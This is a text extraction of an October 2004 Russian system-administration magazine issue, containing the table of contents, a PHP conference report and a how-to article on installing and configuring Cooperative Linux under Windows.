№10(23) октябрь 2004

подписной индекс 81655

www.samag.ru

Знакомство с Cooperative Linux

Идеальный карманный компьютер
для системного администратора
Bluetooth + Linux
Настройка squid
для использования авторизации
из домена Windows 2000
Установка и настройка W2K Server
Четырехузловой кластер
с балансировкой нагрузки
без внешнего массива данных
PostgreSQL: функции и триггеры
Внутренний веб-сервер
№10(23) октябрь 2004

STAT – совсем другая IDS

Поиск троянов вручную
 оглавление

РЕПОРТАЖ PostgreSQL: функции и триггеры

Сергей Супрунов
Итоги III международной конференции amsand@rambler.ru 42
«Современные технологии эффективной
разработки веб-приложений
с использованием PHP» Внутренний веб-сервер
Дмитрий Горяинов Сергей Супрунов
dg@webclub.ru 4 amsand@rambler.ru 48

АДМИНИСТРИРОВАНИЕ СЕТИ

Знакомство с Cooperative Linux На пути повышения надёжности

и скорости: Linux bonding
Михаил Платов
platov@cs.vsu.ru 6 Павел Закляков
amdk7@mail.ru 54
OpenGroupware.org,
или Последний кирпич в стене STAT – совсем другая IDS
Сергей Яремчук Сергей Яремчук
grinder@ua.fm 12 grinder@ua.fm 60

Идеальный карманный компьютер Hakin9 Live

для системного администратора
Часть 1 Сергей Яремчук
grinder@ua.fm 66
Андрей Маркелов
andrew@markelov.net 17
Поиск троянов вручную
Bluetooth + Linux, или Синий зуб Денис Батранков
на службе системного администратора denis@gov.ru 68
Андрей Бешков
tigrisha@sysadmins.ru 20 ОБРАЗОВАНИЕ

Настройка Squid для использования Восстановление данных на NTFS-разделах

авторизации из домена Windows 2000 Часть 2
Рашид Ачилов Крис Касперски
shelton@granch.ru 30 kk@sendmail.ru 80

Четырехузловой кластер Установка и настройка W2K Server

с балансировкой нагрузки
без внешнего массива данных Роман Марков
stepan-razin@newmail.ru 88
Геннадий Дмитриев
stranger03@mail.ru 36
BUGTRAQ 41, 59, 78

№10(23), октябрь 2004 1

 репортаж
ИТОГИ ТРЕТЬЕЙ МЕЖДУНАРОДНОЙ КОНФЕРЕНЦИИ
«СОВРЕМЕННЫЕ ТЕХНОЛОГИИ ЭФФЕКТИВНОЙ РАЗРАБОТКИ
ВЕБ-ПРИЛОЖЕНИЙ С ИСПОЛЬЗОВАНИЕМ PHP»
23-24 сентября в Москве, в помещении Дворца культуры
МАИ, прошла третья международная конференция «Совре-
менные технологии эффективной разработки веб-приложе-
ний с использованием PHP». Конференция была организо-
вана сообществом веб-разработчиков PHPClub (http://php
club.ru) и интернет-агентством WebProfy (http://webprofy.ru).
PHP представляет собой свободно распространяемую
среду программирования с открытым API и возможностя-
ми модульного расширения, изначально созданную для об-
работки HTML-форм и создания веб-страниц.
Вместе с тем в основе технологии PHP лежит ядро (или
движок), разрабатываемое и поддерживаемое компанией
Zend (http://www.zend.com).
Эти две особенности делают ситуацию с PHP довольно
уникальной, развитие технологии представляет собой совме-
стное творчество сообщества независимых разработчиков
и профессиональной целенаправленной работы программи-
стов Zend по совершенствованию и улучшению базового
движка.
Долгое время за PHP была закреплена слава языка веб-
сценариев для системных администраторов. Изначально за-
думанный как простой инструмент для обработки HTML-
форм и создания веб-страниц язык представляет собой
весьма дружественную среду разработки для Web. PHP –
язык-полиглот. Он дает возможность общаться с большим
количеством баз данных, упрощает анализ данных браузе-
ра, может выполнять HTTP-запросы и обладает множеством
встроенных средств решения практических задач.
Прошедшая конференция еще раз подтвердила реноме
PHP как технологии, своевременно и гибко реагирующей на
проблемы сегодняшнего дня. Совместный доклад Алексан-
дра Календарева (независимый разработчик, кандидат эко-
номических наук, Россия) и Вадима Крючкова (системный
администратор, веб-программист компании InForce, Москва,
Россия) «Интеграция информационной системы предприя-
тия (на базе 1С) c веб-сайтом и PHP-приложениями» касал-
ся очень актуальной области современных веб-систем – вза-
имодействия веб-приложений и прикладного программного
обеспечения. Готовое решение, поставляемое фирмой 1С в
стандартной комплектации, ориентировано на использова-
ние и интеграцию учетной системы с веб-сервером MS IIS
компании Microsoft. Докладчики привели альтернативное
решение, рассмотрев возможности 1С для организации об-
мена данными, вопросы отправки, получения и защиты дан-
ных в системе, где веб-сайт (витрина) и учетная система пред-
ставляют собой независимые приложения.
Аспектам коммерческого применения веб-проектов был
посвящен доклад руководителя проектов компании
RoyalHolding Евгения Бондарева (Киев, Украина): «Платеж-
ные системы, взгляд изнутри». Были затронуты вопросы
виртуальных и реальных денег, типовые способы взаимо-
4
действия с платежными системами и конкретные приме-
ры. В рамках доклада были рассмотрены как западные пла-
тежные системы, так и их аналоги в России и на Украине.
Не остался в стороне и вопрос выбора того или иного ре-
шения с точки зрения доступности, возможности проведе-
ния платежа и фактора доверия со стороны конечного по-
сетителя веб-сайта.
Приступая к разработке системы с возможностью осу-
ществления веб-платежей, не следует забывать о том, что
проведение банковских операций между банками разных
стран может оказаться более сложным, чем посещение веб-
сайта. В этом смысле виртуальные деньги таких систем,
как WebMoney, остаются пока более доступным средством
проведения платежей в Интернете. Кроме того, фактор до-
верия случайного посетителя к вашему веб-сайту не на-
столько высок, чтобы однозначно предлагать ему ввести
реквизиты кредитной карты. Современные системы элект-
ронных платежей предоставляют веб-разработчикам не
только возможность прямого обращения к шлюзу, но и воз-
можность переброски клиента на специальный интерфейс
(Merchant-панель) на стороне сервера самой платежной си-
стемы. В этом случае плательщик однозначно видит, что
данные идут только платежной системе. Фактор доверия
при такой схеме платежей выше.
Вместе с тем на конференции нельзя было обойти сто-
роной и традиционные аспекты веб-программирования. Су-
ществует целый класс задач, в той или иной форме возни-
кающих практически перед любым веб-разработчиком. Док-
лад Алексея Рыбака по теме «Поиск на сайте средствами
php, mysql и ispell: выбор между возможностями, качеством
и производительностью» был одной из изюминок конфе-
ренции, интерес к которой со стороны аудитории можно
было легко предсказать заранее.
Участникам конференции был представлен каркас по-
исковой системы с использованием словарных индексов,
хранением и поиском объектов морфологии, правил сло-
вообразования и поиском словоформ. В качестве сферы
применения рассматривались малые и средние проекты.
Алексей Рыбак сделал упор на вопросах подключения вне-
шних словарей к базе данных, рассмотрел стратегии поис-
ка по оригинальной и нормализованной форме, способы
повышения производительности такой системы.
В докладе были затронуты некоторые наиболее попу-
лярные бесплатные (условно-бесплатные) решения, такие
как MnoGoSearch (http://mnogosearch.ru), Ht://Dig (http://
htdig.org), RiSearch (http://www.risearch.org) и промышлен-
ные решения, такие как Яndex.Server (http://company.
yandex.ru/technology/products/yandex-server.xml) и RCO от
«Гарант-Парк Интернет» (http://www.rco.ru).
Дмитрий Котеров, главный программист Host-ing.Ru (Мос-
ква, Россия) и автор книги «Самоучитель PHP4», затронул

еще одну актуальную тему разработки веб-приложений – бе-
зопасность и защиту от злоумышленников. В докладе «Воп-
росы безопасности веб-программирования» были рассмот-
рены пути противодействия традиционной уязвимости PHP-
приложений к SQL-Injection (взлом базы данных за счет из-
начальной слабости в архитектуре API для работы с MySQL).
В качестве решения был предложен метод placeholder, со-
здающий дополнительный «защитный слой» между зап-
росами и API. Подобную идеологию поддерживает и новое
расширение PHP5 mysqli, предназначенное для работы с
MySQL версии 4 и старше. Дмитрий Котеров затронул так-
же темы кражи идентификаторов сеанса, проблему неяв-
ных включений файлов и возможных путей противодей-
ствия DoS-атакам (антифлудинг, ограничение ресурсов).
Технология PHP крайне динамична и не стоит на месте.
Открытость и возможности расширения предоставляют ко-
нечному разработчику приложений механизм для создания
и встраивания в систему собственных модулей. Этому был
посвящен доклад Антона Довгаля «Разработка модулей
(расширений) PHP на примере memcache». Модуль
memcache предоставляет разработчику механизмы кэши-
рования запросов и данных и используется в таком попу-
лярном сетевом сервисе, ставшим целым явлением, как
«Живой Журнал» (http://www.livejournal.com).
Язык PHP получил очень сильную поддержку и обрел
профессиональное ядро благодаря усилиям и участию в его
развитии компании Zend. Сейчас корпорация Zend готова
совершить еще одну маленькую революцию – внедрить но-
вую версию ядра (Zend Engine 2) и, соответственно, 5-ую
версию языка PHP, реально ориентированную на техноло-
гию объектно-ориентированного программирования. Новым
особенностям и возможностям, предлагаемым разработчи-
ками ядра PHP своим пользователям, был посвящен док-
лад Ивана Устюжанина (системный администратор ежене-
дельника «Московский комсомолец» в Курске, Россия) и
Константина Барышникова (системный администратор и
программист, ведущий ресурса http://www.php5.ru) «Нет
авралу! Плавный переход на PHP5». В применении ООП
сейчас уже нет ничего революционного, эта идеология дав-
но стала привычной и естественной в современных языках
программирования. Но предлагаемый переход от предос-
тавления средств написания программ в стиле ООП к ре-
Ôîòî ïðåäîñòàâëåíî îðãàíèçàòîðàìè êîíôåðåíöèè
№10(23), октябрь 2004
репортаж
альной поддержке этого способа программирования в рам-
ках интерпретируемого языка – это действительно нечто!
Каковы же перспективы использования новой версии PHP?
С точки зрения массовой веб-разработки, та или иная техно-
логия или новая версия становятся реальностью лишь с ее
внедрением и поддержкой со стороны провайдеров хостин-
говых услуг. По заявлению некоторых российских провай-
деров, выступивших спонсорами конференции, хостинг с ис-
пользованием PHP5 уже сейчас становится реальностью.
В рамках конференции прошли два мастер-класса. Пер-
вый был посвящен особенностям работы с сервером баз дан-
ных PostgreSQL (Алексей Борзов, независимый разработчик,
Москва, Россия), второй – использованию идеологии и ме-
тодик экстремального программирования в разработке веб-
проектов (Александр Смирнов, основатель клуба разработ-
чиков PHP – PHPClub.ru, Москва, Россия). Увы, временные
рамки вынудили организаторов конференции проводить
мастер-классы параллельно некоторым докладам.
Как уже отмечалось, организаторами конференции вы-
ступили сообщество веб-разработчиков PHPClub и интер-
нет-агентство WebProfy. Подобный союз независимой об-
щественной организации и коммерческой компании доволь-
но символичен для PHP. Уровень проведения конференции
оставил очень благоприятное впечатление. Организаторам
удалось обеспечить участников конференции не только пе-
чатными материалами и питанием, но и такой важной «ме-
лочью», как возможность в любой момент выпить чашку
чая или кофе.
Главным успехом конференции можно назвать привле-
чение к участию в ней профессиональных веб-разработчи-
ков, разделенных географическим положением, работаю-
щих и проживающих в различных странах СНГ и Прибал-
тики. Живое общение в кулуарах, возникающее вокруг кого-
то из докладчиков или стихийно, само по себе не прекра-
щалось ни на минуту и было весьма интересно и ценно.
Вне всякого сомнения усилия организаторов заслуживают
одобрения и благодарности как за подбор и освещение
поднятых на конференции вопросов, так и за предостав-
ленную участникам возможность неформального обмена
мнениями и идеями в профессиональной среде.
Дмитрий Горяинов
5
 администрирование
ЗНАКОМСТВО С COOPERATIVE LINUX
Исторический экскурс
25-27 января 2004 года новостные ленты большинства ин-
формационных изданий, так или иначе посвященных ком-
пьютерной тематике, пестрили такими сообщениями: «Linux
теперь можно запускать в Windows», «Linux и Windows без
перезагрузок», «Революционное изобретение 21-летнего
гения» и т. д. Мир узнал о новом проекте – Cooperative Linux
(сокращенно – coLinux). В анонсах сообщалось о том, что
теперь появился еще один способ «подружить» две самые
популярные операционные системы – Linux и Windows. Для
достижения поставленной цели разработчики использова-
ли довольно интересное решение – запуск Linux-ядра как
отдельного процесса Windows. В качестве иллюстрации ра-
боты системы показывались скриншоты японской версии
(спасибо японским спонсорам) широко известного дистри-
бутива Knoppix:
Однако радость от этого во многом знаменательного
события несколько омрачалась тем, что попробовать coLinux
в деле реально смогли немногие – проект был доступен
только в виде исходного кода, собрать который было от-
нюдь не просто. Впрочем, такая ситуация не могла длиться
вечно, и вскоре появилась первая бинарная версия
coLinux. У кого-то она запустилась, у кого-то нет, но рабо-
та продолжалась и проект развивался. Постепенно coLinux
освободился от связей с Microsoft DDK и cygwin, избавил-
ся от многих ошибок, обзавелся новой функциональнос-
6
МИХАИЛ ПЛАТОВ
тью (http://www.colinux.org/?section=status). Последняя дос-
тупная на момент написания статьи stable-версия coLinux –
0.6.1, именно о ней и пойдет речь в данной статье. Но преж-
де чем приступить к рассмотрению самого coLinux, несколь-
ко слов о том, что это такое и для чего это нужно.
Зачем нужен coLinux
Условно можно выделить несколько групп пользователей,
для которых coLinux представляет практический интерес.
В первую очередь это разработчики, принимающие учас-
тие в создании кроссплатформенных приложений, систем-
ные администраторы, интересующиеся возможностями
Linux-систем, преподаватели учебных заведений, и, конеч-
но, простые пользователи, желающие познакомиться с Linux
поближе.
Другими словами, coLinux в первую очередь интересен
тем людям, которые в своей повседневной работе одновре-
менно используют две операционные системы – Linux и
Windows. Минуточку, но ведь эта проблема не нова! Ведь
есть уже vmWare, VirtualPC, bochs, xen, wine, cygwin и дру-
гие проекты, решающие проблему организации одновре-
менной работы в нескольких ОС. Чем же примечателен
coLinux? Что выделяет его среди конкурентов? Для того
чтобы ответить на эти вопросы, давайте более пристально
посмотрим на то, как сейчас решается проблема организа-
ции работы в нескольких ОС:
! Виртуальные машины. Типичные представители –
vmWare, VirtualPC, bochs, xen. В этом случае вторая ОС,
называемая гостевой, запускается в так называемой вир-
туальной машине. У этой машины есть свое «виртуаль-
ное» оборудование, BIOS и, конечно, своя операционная
система. Отличительной особенностью является то, что
операционная система и ее программы практически и не
догадываются о том, что они работают в виртуальной ма-
шине. Для них все происходит так же, как и при работе
на обычном компьютере. Преимущества этого подхода
очевидны: подавляющее большинство программ без про-
блем будут работать в виртуальной машине без каких-
либо изменений в их исходном коде. Платой же за такую
«универсальность» является скорость, которая, как не
трудно догадаться, будет ниже, чем при работе этой же
системы на реальном оборудовании.

! Эмуляция на уровне API (wine, cygwin, mingw). Идея это-
го подхода состоит в том, чтобы запустить уже суще-
ствующее Linux/Windows-приложение, эмулируя API «чу-
жеродной» ОС. Такой подход позволяет добиться боль-
шей производительности (по сравнению с виртуальной
машиной), однако никто не сможет дать гарантий отно-
сительно того, как будет (если вообще будет) работать
ваше любимое приложение в wine или cygwin.
Теперь осталось определить, к чему же относится coLinux,
для этого давайте более пристально посмотрим на то, как
он устроен.
CoLinux, взгляд изнутри
CoLinux представляет из себя набор нескольких модулей,
работающих на разных уровнях операционных систем
Windows и Linux. Условно в составе coLinux можно выделить
следующие компоненты: драйвер ОС Windows, отвечающий
за предоставление ядру Linux доступа к процессору и памя-
ти, несколько модифицированное ядро ОС Linux (для того
чтобы работать с Windows-драйверами coLinux), драйверы
Linux и Windows, отвечающие за организацию взаимодей-
ствия Linux с «внешним миром» (Ethernet, console), драйве-
ры блочных устройств для отображения устройств Windows
на блочные устройства coLinux.
За непосредственный запуск coLinux отвечает специаль-
ная программа – coLinux-daemon. Используя Windows-драй-
веры, coLinux-daemon формирует окружение, в котором
начинает выполняться ядро ОС Linux. Фактически coLinux-
daemon является аналогом lilo и grub, выступая в coLinux в
качестве загрузчика ядра.
Давайте более подробно остановимся на задачах, ре-
шаемых основными компонентами coLinux:
! Демон coLinux. Один из ключевых компонентов систе-
мы. Фактически это загрузчик, который, объединяя все
остальные компоненты coLinux, создает окружение, в
котором исполняется ядро Linux.
! Драйвер блочных устройств. Главной задачей этого
драйвера является предоставление доступа к устрой-
ствам, имеющимся в ОС Windows, как к блочным. В
coLinux этот драйвер используется для задания отобра-
жения устройств или файлов Windows на блочные уст-
ройства coLinux, которые в дальнейшем могут быть
смонтированы при помощи стандартной утилиты mount.
На данный момент coLinux поддерживает определение
отображений для 32 устройств. Отдельно отметим тот
факт, что отображать можно не только отдельные фай-
лы, содержащие образы linux-файловых систем, но и
реальные разделы жестких дисков. Это позволяет ис-
пользовать coLinux для запуска в Windows уже суще-
ствующих инсталляций Linux-систем.
№10(23), октябрь 2004
администрирование
! Ethernet-драйверы. Как не трудно догадаться из назва-
ния, эти драйверы используются для организации взаи-
модействия нашей Linux-системы с внешним миром. Так,
с coLinux можно использовать либо виртуальный TAP-
драйвер, либо библиотеку WinPCap.
! Драйверы клавиатуры и консоли используются для орга-
низации взаимодействия с Linux в привычном для мно-
гих пользователей режиме – через консоль.
Итак, судя по приведенной выше классификации, coLinux
скорее относится к виртуальным машинам, чем к API-эму-
ляторам. Ведь фактически он создает некую виртуальную
машину.
Кроме того, у coLinux есть и определенные черты, вы-
годно выделяющие его среди возможных конкурентов. Так,
он не эмулирует виртуальную машину в обычном для нас
понимании. Он не эмулирует процессор, BIOS, память и
другие устройства.
При помощи специальных драйверов, работающих на
нулевом кольце защиты ОС Windows (ring 0), coLinux дает
возможность ядру Linux работать с имеющимся в Windows
оборудованием. Теоретически такой подход должен обес-
печить большее по сравнению с обычными виртуальными
машинами быстродействие. Платой же за это потенциаль-
ное увеличение скорости является отказ от универсаль-
ности. Чтобы linux-ядро стало coLinux-совместимым, к
нему применяется специальный патч, позволяющий рабо-
тать ядру в окружении, создаваемом демоном coLinux (ра-
бота с Windows-оборудованием, управление памятью вы-
деляемой демону и т. д.). Таким образом, выполнение в
виртуальной машине coLinux чего-либо отличного от ядра
Linux становится либо затруднительным (для ОС с откры-
тым исходным кодом), либо вообще невозможным (для ОС
с закрытым исходным кодом).
Установка и запуск
Установка coLinux очень проста. Все, что нам нужно, это
загрузить с сайта http://www.colinux.org инсталлятор coLinux
(coLinux-0.6.1.exe) и запустить его.
В процессе установки выберем все возможные компо-
ненты:
В качестве пути установки выберем «C:\coLinux»:
7
 администрирование
В принципе здесь можно выбрать любой каталог, одна-
ко тогда нужно будет учесть это при редактировании кон-
фигурационного файла.
Далее инсталлятор предложит нам скачать библиотеку
WinPCap, необходимую для организации работы coLinux не-
посредственно с сетевой картой компьютера (bridged-режим).
В следующем диалоге инсталлятора мы можем автома-
тически скачать образ root-файловой системы (Gentoo,
Debian или Fedora Core 1 (скачивается вручную c сайта
coLinux)). Образы отличаются размером и, соответствен-
но, количеством уже установленных пакетов. В принципе
здесь можно выбрать образ на основе любого из вышепе-
речисленных дистрибутивов или использовать раздел от
уже установленной ОС Linux, однако для простоты и конк-
ретности изложения будем полагать, что в процессе уста-
новки было принято решение в пользу образа Gentoo-deluxe.
После нажатия кнопки «Install» на вашем компьютере
будут установлены все необходимые драйверы (все, кроме
WinPCap, который нужно устанавливать «вручную») и ядро.
Кроме того, в папку установки инсталлятором будет загру-
жен образ выбранной root-файловой системы.
После окончания установки в папке c:\coLinux появится
несколько файлов. Нам в первую очередь понадобятся сле-
дующие:
! Gentoo-i586-ext3-2g-deluxe.bz2
! Default.coLinux.xml
8
Первый файл представляет собой сжатый образ root-
файловой системы. Для его распаковки можно воспользо-
ваться любым архиватором, понимающим формат bz2, на-
пример, 7zip (http://www.7zip.org). Для простоты распакуем
файл в c:\coLinux\Gentoo-i586-ext3-2g-deluxe.
Второй файл является не чем иным, как конфигураци-
онным файлом coLinux. Синтаксис его достаточно прост. В
стандартном для XML формате в нем определяются следу-
ющие настройки:
! Отображение фалов (или разделов) Windows на блоч-
ные устройства coLinux.
! Путь к файлу ядра Linux.
! Параметры, передаваемые ядру.
! Количество ОЗУ, выделяемого coLinux.
! Настройки сетевого интерфейса.
Чтобы не «портить» первоначальный файл, скопируем
его с именем gentoo.xml и внесем в него некоторые изме-
нения. Для начала укажем местоположение root-файловой
системы:
<block_device index="0" path="\DosDevices\c:\coLinux\ ↵
gentoo-i586-ext3-2g-deluxe" enabled="true" />
Далее подправим настройки сетевого интерфейса. Для
определенности будем считать, что мы используем вари-
ант с TAP. Тогда строка конфигурации <network> будет
иметь следующий вид:
<network index="0" type="tap">
Кроме того, для нормальной работы нам, скорее все-
го, понадобится swap-раздел. По умолчанию он не созда-
ется инсталлятором, поэтому его придется скачать, рас-
паковать и подключить вручную. Для этого с сайта http://
gniarf.nerim.net/colinux/swap загрузим сжатый образ swap-
файла нужного размера, распакуем его в c:\coLinux\
swap_256Mb и добавим в файл конфигурации следующую
строчку:
<block_device index="1" path="\DosDevices\c:\coLinux\ ↵
swap_256Mb"
Итак, с настройкой демона coLinux мы закончили, и те-
перь можно смело перейти к настройке сетевой части в
Windows.
После установки coLinux в сетевых подключениях у нас
появился еще один сетевой адаптер:
Именно через него у нас и будет работать Linux.
Для доступа к Интернету воспользуемся стандартным
(начиная с Windows 2000) механизмом Internet Connection
Sharing (ICS). (Дополнительную информацию об ICS можно
найти в справке Windows.)
Активизируется он до неприличия просто – открываем
свойства первого сетевого подключения по сети и ставим
«галочки» в разделе «общий доступ подключения к Интер-
нету»:

Теперь самое время перейти к запуску системы. Созда-
дим и запустим cmd-файл со следующим содержимым:
colinux-daemon.exe -t nt -c gentoo.xml
Входим в систему как root (без пароля) и первое, что
делаем... правильно, меняем пароль с помощью програм-
мы passwd. По умолчанию Gentoo-образ использует DHCP
для конфигурации сетевого интерфейса. Так как для орга-
низации соединения мы используем ISC, включающий в
себя DHCP-сервер, то сразу же после загрузки coLinux у
нашей linux-машины уже будет настроен IP-адрес, шлюз по
умолчанию и адрес DNS-сервера. Однако если вам вдруг
понадобится поменять эти настройки, то в Gentoo это де-
лается путем редактирования следующих конфигурацион-
ных файлов: /etc/conf.d/net и /etc/resolv.conf.
Итак, двигаемся дальше. Проверяем файл /etc/fstab.
Root-файловая система в нем прописана правильно (ука-
зывает на /dev/cobd0), а вот swap-файл у нас, скорее всего,
будет не подключен. Исправим это с помощью пока един-
ственного доступного нам в данный момент редактора nano:
# nano /etc/fstab
Добавим в fstab следующую строку:
/dev/cobd1 swap swap defaults 0 0
Проинициализируем swap-файл:
# mkswap /dev/cobd1
№10(23), октябрь 2004
администрирование
и, наконец, включим его:
# swapon –a
Если все было сделано правильно, то после команды
# swapon –s на экране мы увидим следующее:
# swapon –s
Filename Type Size Used Priority
/dev/cobd1 partition 262136 0 -1
Установка и обновление программ
Итак, теперь у нас есть установленная и минимально на-
строенная система. Тем не менее, поработав в ней некото-
рое время, начинаешь понимать, что программ, имеющих-
ся в стандартном образе явно не хватает. Так, даже в са-
мом большом доступном для скачивания образе файловой
системы – Gentoo-deluxe – после установки нет таких про-
грамм, как vi, mc, nslookup, telnet, links, tracert и многих дру-
гих. Кроме того, лично мне также захотелось поставить
sshd, samba и apache и нескольких других пакетов, необхо-
димых для моей работы. Благо мучиться долго не пришлось,
т.к. для установки и удаления программ в Gentoo Linux есть
Portage – мощная система управления пакетами. Фактичес-
ки она является своеобразной копией системы «портов»,
уже давно существующей во FreeBSD, однако в Gentoo
«порты» FreeBSD называются ebuild’s. Суть их от этого, прав-
да, не меняется. Так же, как и во FreeBSD, они содержат
информацию, необходимую для сборки каждого пакета из
исходных кодов. Установка программ с использованием
Portage производится почти автоматически. Достаточно
выполнить одну команду, и нужный пакет будет скачан,
скомпилирован и установлен на вашем компьютере. Для
иллюстрации работы Portage рассмотрим процесс установ-
ки пакета mc (Midnight Commander).
Первое, что нам нужно сделать для после установки
Gentoo, – это синхронизировать локальный репозиторий
Portage с репозиторием, хранимым на сервере. Для этого
выполним команду #emerge sync. После ее запуска скрипт
emerge загрузит в /usr/portage список всех доступных на
данный момент ebuild-скриптов. Теперь можно приступить
к установке любого из пакетов, имеющегося в Portage, в
том числе и mc. Для этого достаточно выполнить команду:
#emerge mc
Система Portage сама загрузит и соберет все необхо-
димые файлы с автоматическим удовлетворением всех
зависимостей от других пакетов:
9
 администрирование
После завершения установки мы увидим следующее:
>>> app-misc/mc-4.6.0-r8 merged.
>>> Recording app-misc/mc in "world" favorites file...
Пакет был успешно установлен, запись об этом была
добавлена в /var/cache/edb/world.
Подключение дополнительных устройств
Время от времени у меня возникала необходимость рабо-
ты с различными устройствами, с которыми я привык рабо-
тать в Windows. И если с некоторыми устройствами (звуко-
вая плата, видеокарта) работать из coLinux на данный мо-
мент нельзя, то с другими (дисковыми) очень даже можно.
Для организации доступа к дисковым устройствам в coLinux
используется драйвер блочных устройств. Для этого
windows-устройство, которое необходимо подключить в
coLinux, сначала в xml-файле отображается на одно из блоч-
ных устройств (cobd), а затем монтируется из Linux при по-
мощи утилиты mount. Следует отметить, что при таком под-
ключении используются не образы файловых систем (как
это было для root-файловой системы и swap-файла), а ре-
альные разделы устройств. Для получения списка всех раз-
делов, имеющихся в Windows, а также правильных путей к
ним можно воспользоваться консольной утилитой dmdiag.exe,
входящей в состав Windows Resource Kit. Запустим эту ути-
литу. Для удобства чтения перенаправим ее вывод в файл:
Dmdiag.exe >>disk.out
В результате в текущем каталоге появится текстовый
файл disk.out, содержащий полное описание всех устройств
хранения, имеющихся на данный момент в распоряжении
ОС Windows. С точки зрения применимости к coLinux нас
прежде всего интересуют секции «Drive letter to device name»
и «\Device\Harddisk». Первая секция описывает отображе-
ния физических устройств на буквы ОС Windows. Из этой
секции мы можем узнать, что буква A: у нас на самом деле
является устройством \Device\Floppy0:
A: \Device\Floppy0
То есть дописав в наш xml-файл следующую строку:
<block_device index="4" path="\Device\Floppy0" ↵
enabled="true" />
мы отобразим дисковод 3.5” на блочное устройство coLinux
cobd4.
Если же мы хотим отобразить раздел жесткого диска,
то на помощь нам придет секция \Device\Harddisk. Так, сле-
дующая строка отобразит третий раздел второго жесткого
диска на cobd5:
<block_device index="5" path="\Device\Harddisk1\ ↵
Partition2" enabled="true" />
Для USB-диска строка конфигурации может быть такой:
<block_device index="6" path="\Device\Harddisk3\ ↵
DP(1)0-0+a" enabled="true" />
Итак, после запуска coLinux и выполнения команды:
10
# mount /dev/cobd4 /mnt/floppy
мы увидим содержимое дискеты в /mnt/floppy. При монти-
ровании разделов напрямую нужно иметь в виду, что из
linux раздел будет подключаться таким, какой он есть. По-
этому ядро должно поддерживать ту файловую систему,
которая имеется на подключаемом разделе (UDF, FAT, NTFS
и т. д.). Кроме того, пока раздел будет смонтирован (или
открыт) в одной системе, в другой он будет недоступен.
Запуск в качестве службы
Кому-то может показаться неудобным, что перед работой с
coLinux нужно предварительно вручную запускать cmd-
файл. Особенно это неприятно в тех случаях, когда в coLinux
выполняются какие-либо сетевые сервисы (apache, samba
или ftp). В таком случае удобно настроить запуск coLinux
как одной из служб Windows. После должной настройки,
coLinux будет автоматически запускаться во время старта
Windows.
Для регистрации coLinux как службы Windows необхо-
димо выполнить следующую команду:
colinux-daemon –c <ïóòü ê xml-ôàéëó>--install-service ↵
<èìÿ ñëóæáû>
После выполнения этой команды в системе появится
служба coLinux с указанным именем.
Для удаления службы достаточно выполнить команду:
colinux-daemon --remove-service <èìÿ ñëóæáû>
Необходимо иметь в виду, что служба устанавливается
с типом запуска «Вручную», так что, если вам необходимо,
чтобы coLinux работал всегда, измените тип запуска служ-
бы на «Автоматически».
Кроме того, существует удобная утилита для работы с уже
установленной службой coLinux – coLinux Manager. Скачать
ее можно отсюда: http://www.biermana.org/index.php?p=54.
Утилита добавляет в панель задач значок coLinux:
С ее помощью можно быстро запускать и останавли-
вать службу coLinux, открывать консоль, а также получать
информацию о количестве используемых coLinux систем-
ных ресурсов.
Выводы
Конечно, в целом появление такого продукта, как coLinux,
не может не радовать. Ведь с его использованием можно
достаточно просто, быстро и бесплатно получить нормаль-
но работающую Linux-систему, сохранив при этом возмож-
ность работы с привычными Windows-программами. Одна-
ко наряду с многочисленными плюсами (бесплатность, ра-
бота напрямую с устройствами Windows, высокая совмес-
тимость с приложениями и т. д.) есть и некоторые минусы.
Так, за все время работы, около двух месяцев, Windows пару
раз порадовала «синим экраном» (чего не наблюдалось в
течение как минимум года до установки coLinux). Кроме
того, огорчила производительность сети (субъективно скла-
дывается впечатление, что работает она достаточно мед-

ленно), а также проблемы работы с некоторыми сетевыми
приложениями (NFS-сервер).
Если вы захотите запустить в coLinux какое-либо X-при-
ложение, то вам придется дополнительно установить X-сер-
вер на Windows-машину (Cygwin-X, Mi-X, Exceed и др.). Так-
же при 100% загрузке процессора наблюдается ощутимое
замедление работы во всех виртуальных консолях coLinux.
Возникает субъективное ощущение, что многозадачность в
coLinux работает по меньшей мере странно. К тому же если
у вас вдруг возникнет желание запустить несколько копий
coLinux на одной машине, то у вас, скорее всего, ничего не
получится – более чем в одном экземпляре на данный мо-
мент coLinux работать не может. Также не стоит забывать о
Способы организации взаимодействия
(NAT vs Bridged)
Итак, для Ethernet-связи с внешним миром в coLinux могут
использоваться два драйвера TAP и WinPCap. На основе
этих драйверов можно по-разному организовать взаимо-
действие Linux- и Windows-систем:
! NAT (Network Address Translation). Механизм сетевого
преобразования адресов. При использовании этого ме-
ханизма внутренние компьютеры подключаются к Интер-
нету через так называемый NAT-сервер, который пере-
хватывает все обращения со стороны внутренних машин
и обращается к интернет-ресурсам от своего имени. По-
лучив результаты запроса, он возвращает их тому кли-
енту, который отправлял запрос. Реализация NAT-сер-
вера в Windows XP называется ICS. ICS представляет со-
бой примитивный (читай «ненастраиваемый») DHCP-сер-
вер, распределяющий между клиентами IP-адреса из под-
сети 192.168.0.х/24. Машина, на которой настроен ICS,
выступает для остальных в качестве шлюза.
! Bridged. При использовании этого метода «вторая» ОС
(в нашем случае – linux) получает доступ к внешнему
соединению, непосредственно используя реальный се-
тевой интерфейс компьютера. В нашем случае для это-
го используется специальный драйвер – WinPCap.
Схематично взаимодействие в режиме NAT с использо-
ванием ICS можно представить так:
При этом большая часть действий по настройке сети
производится автоматически. Единственное, что нам нуж-
но сделать, это включить ICS в настройках сети и пропи-
сать режим tap в конфигурационном файле coLinux. Все
остальное за нас сделает ICS.
В bridged-варианте вместо TAP-драйвера используется
библиотека WinPCap, позволяющая непосредственно рабо-
тать с сетевым адаптером. Схема взаимодействия имеет вид:
№10(23), октябрь 2004
администрирование
том, что coLinux не является эмулятором виртуальной ма-
шины, в том же смысле что и vmware. Так, используя доступ-
ную на данный момент версию, нельзя запустить еще одну
копию windows, Netware или FreeBSD. Только Linux только в
Windows и не более чем в одном экземпляре! Однако если
все вышеперечисленные «минусы» не являются для вас кри-
тичными, то можете смело использовать coLinux. В конце
концов, этот достаточно молодой продукт показал очень не-
плохие результаты как в производительности, так и в совме-
стимости при запуске Linux-приложений. Кроме того, не сле-
дует забывать, что coLinux является совершенно бесплат-
ным.
При использовании этого способа никакая дополнитель-
ная конфигурация со стороны ОС Windows не требуется,
достаточно просто установить драйвер WinpCap. Со сторо-
ны coLinux все стандартно – нужно задать IP-адрес (марш-
рутизируемый), шлюз по умолчанию и адрес DNS-сервера.
Кроме того, в разделе <network> конфигурационного xml-
файла необходимо указать следующее:
